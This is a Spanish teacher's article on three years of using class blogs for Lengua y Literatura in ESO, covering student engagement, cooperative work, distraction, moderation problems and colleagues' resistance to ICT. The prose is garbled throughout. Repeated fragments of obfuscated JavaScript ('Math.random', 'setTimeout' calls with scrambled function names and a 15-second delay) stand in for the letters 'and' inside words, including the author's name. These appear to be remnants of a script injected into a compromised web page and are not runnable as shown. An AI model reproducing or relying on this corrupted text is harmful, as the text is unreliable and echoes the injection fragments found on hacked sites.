EL BLOG EN EL AULA: Experiencias, Ventajas e Inconvenientes

Autora: Sandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andra Martínez Martín

Este artículo pretende reunir las ventajas e inconvenientes de la herramienta del blog como elemento didáctico en el aula con el fin de facilitar la tarea educativa del docente y permitir al alumno interactuar con la asignatura de una forma más amena y atractiva. El artículo está basado en experiencias reales tras tres cursos lectivos donde se ha empleado el blog como herramienta TIC para el estudio y trabajo de la materia de Lengua castellana y Literatura.

EL BLOG EN EL AULA: EXPERIENCIAS. VENTAJAS E INCONVENIENTES.

Durante el primer curso creé un blog educativo con la intención de trabajar los contenidos de la asignatura de Lengua y Literatura orientada al nivel de 3º de la ESO. Durante los primeros días de clase anuncié la creación de este blog en los niveles de 1º, 2º y 3º pero finalmente me incliné por los de 3º pues mostraron un mayor interés y curiosidad por el empleo de esta herramienta hasta el momento desconocida para ellos. Insistieron bastante en que rápidamente empleáramos los ordenadores en el aula. Otro de los motivos por los que tomé dicha decisión fue que los alumnos de 2º y 1º manifestaban una conducta más negativa en cuanto al cuidado de los materiales (maltrataban bastante los ordenadores, teclados y ratones).

Para involucrar aún más a los alumnos, les indiqué los pasos necesarios para crear un blog en Blogspot.com con el objetivo de que alguno de ellos se animara en el futuro a utilizar esta herramienta de forma individual (no me consta que esto haya ocurrido finalmente).

Durante todo el curso yo fui administrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el blog y creandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las entradas, introduciendo imágenes, enlaces, etc. Solo utilicé el blog como una herramienta complementaria a los contenidos curriculares de la asignatura y nunca al contrario, es decir, el blog debía servir para perfeccionar algún contenido o trabajarlo de una forma más amena. En ningún caso considero que el blog pueda sustituir la explicación oral del docente.

Los alumnos se mostraron durante todo el curso entusiasmados con la idea de trabajar a través del blog aunque muy pocos se atrevieron a verter sus comentarios. Pude deducir después de conocer bien a mis alumnos que esto venía motivado por su timidez (hecho extraño teniendo en cuenta que todos ellos manejan a la perfección Tuenti y demás redes sociales).

Después de la grata experiencia de este primer curso, en octubre de 2009 iniciamos otro en WordPress para el nivel de 4º de la ESO. Este nuevo blog nace de un proyecto que titulé Proyecto Méntor: un grupo de trabajo del que soy coordinadora en el CPR de Almendralejo con el fin de formar a algunos compañeros en el uso de los blogs.

Muchos de los alumnos que utilizaron el blog en 3º estaban dentro de este nuevo grupo y la idea de volver a hacer un nuevo blog les entusiasmó y este sentimiento contagió al resto. Al principio tuve que orientarles y describir los usos del blog y la intención que tenía dentro del aula. Este año lo he orientado más a la inmersión de otras herramientas que poco a poco he ido creandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando: diapositivas, HotPotatoes, páginas web…

Cómo trabajan los alumnos con el blog (ventajas e inconvenientes):

Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando les anuncio que vamos a hacer alguna actividad a través del blog se vuelven más inquietos y a su vez más activos (más centrados en la actividad que vamos a realizar). El simple hecho de hacer la actividad a través del ordenador permite que el alumno esté mucho más receptivo. Todos los alumnos acaban haciendo el ejercicio que les pido.

Teniendo en cuenta que en nuestras clases tenemos la disponibilidad de un ordenador por cada dos alumnos, el empleo del blog “obliga” a un trabajo y aprendizaje cooperativo. Los alumnos resuelven las dudas entre ellos y los más rezagados se ven impulsados por los alumnos que tienen una capacidad de trabajo más entusiasta. Ellos mismos se vuelven “investigadores” de la materia.

El blog me permite introducir contenidos creados por mí misma de una forma fácil y rápida sin necesidad de depender de materiales más lentos como el material fotocopiable. Además, puedo introducir textos, páginas, vídeos relacionados con la Educación en Valores.

La inclusión de enlaces a otras páginas y herramientas en el blog nos facilita el poder resolver dudas, investigar, ampliar información sobre el contenido que estamos trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando de un modo muy eficiente y veloz.

Otra ventaja es que el alumno siempre puede disponer de los materiales del blog fuera del contexto del Instituto. Puede acceder además a otras informaciones como actividades extraescolares.

En numerosas ocasiones les he indicado que pueden emplear el blog para contactar conmigo y resolver dudas desde casa, pero nunca lo han empleado para ello. No obstante, se les facilitó un correo electrónico al que me mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andaban algunos trabajos solicitados.

Inconvenientes:

En ocasiones he aprovechado el mismo blog en otros niveles como en 2º de la ESO, pero mi experiencia con alumnos de este nivel no ha sido demasiado satisfactoria. No presentan la misma capacidad de trabajo ni de atención; suelen desviarse a otras páginas (juegos, Tuenti…) y definitivamente tengo que detener la actividad que en principio podría haber sido más grata. Debemos tener en cuenta que los grupos de 2º ESO en los que imparto mis funciones están formados por grupos muy diversos donde un 40% aproximadamente de ellos no tiene demasiadas motivaciones por aprender.

Además, algunos alumnos conflictivos de estos niveles más bajos, han llegado a emplear su anonimato para enviar comentarios obscenos y fuera de lugar al blog, lo cual me ha obligado a tener que restringir los comentarios y tener que moderarlos personalmente. Esto limita a los usuarios o visitantes que desean participar de forma positiva en el blog, aunque no sean alumnos o usuarios habituales pero tengan la intención de dejar un comentario útil o ameno.

Por otro lado, también debemos tener en cuenta que cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se plantea una actividad a través del blog en muchas ocasiones encontramos inconvenientes que nos hacen perder bastante tiempo: la conexión a internet suele ser bastante lenta. A veces algunos ordenadores ni siquiera encienden. Algunos teclados y ratones no funcionan o están dañados por un mal uso del alumnado. O directamente no se carga la página que buscamos. Estos obstáculos ralentizan la actividad y nos suelen hacer perder una media de 10-15 minutos hasta que finalmente todos los alumnos están centrados en la tarea.

Otros aspectos:

Muchos profesores del centro desconocen totalmente el uso de un blog en el aula. Este año se han formado algunos de ellos debido a que se ha realizado un curso de formación del profesorado para la creación de blogs y el empleo de Medellín para la creación de páginas webs. Muchos docentes manifestaron que no le veían ninguna utilidad al blog puesto que los mismos materiales que introducían en este medio podían ofrecerlos a los estudiantes de manera tradicional. El desconocimiento de las herramientas TICs se hace muy patente hasta el punto de que algunos no saben emplear correctamente ni tan siquiera un correo electrónico. Existe un rechazo generalizado al uso de las TICs y tanto es así que los profesores de 1º de la ESO han recibido los portátiles de la Junta con críticas y desánimo, y prácticamente podemos afirmar que se han utilizado muy poco en materias concretas y nada en otras, por lo que se ha convertido en material con ricas posibilidades pero frustradas por la inapetencia tecnológica del profesor o bien por su desmotivación o incluso a veces, falta de tiempo por culpa de un currículo demasiado extenso.

Desde una experiencia aún más cercana, los profesores que he formado en el grupo de trabajo para el aprendizaje de los blogs (Proyecto Méntor), se han mostrado más colaborativos exceptuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando un par de casos que no encontraron ningún interés en esta herramienta, llegandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andonar el curso uno de los miembros.

Por otro lado, puedo confirmar que gracias al uso del blog en el aula he podido apreciar que los alumnos de 4º ESO desconocen en gran manera el uso básico de las herramientas TICs. Exceptuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando Tuenti, Messenger y otros, los estudiantes presentan una alarmante carencia de contenidos básicos informáticos: por ejemplo: el uso del programa de escritura de OpenOffice. Buscar una dirección web a través del buscador Google o Yahoo en lugar de hacerlo directamente en el directorio. O por ejemplo abrir distintas páginas web de un enlace a otro sin hacerlo en pestañas diferentes para recuperarlas al instante (algo bastante simple).

Es preciso y urgente que la Competencia Digital inmersa en el Currículo Extremeño sea revisada y se trabaje de un modo más serio y profundo, pero evidentemente, primero debemos formar en esta materia a nuestros docentes.

BIBLIOGRAFÍA:

http://vozdelaula.blogspot.com

http://ensenamelalengua.wordpress.com

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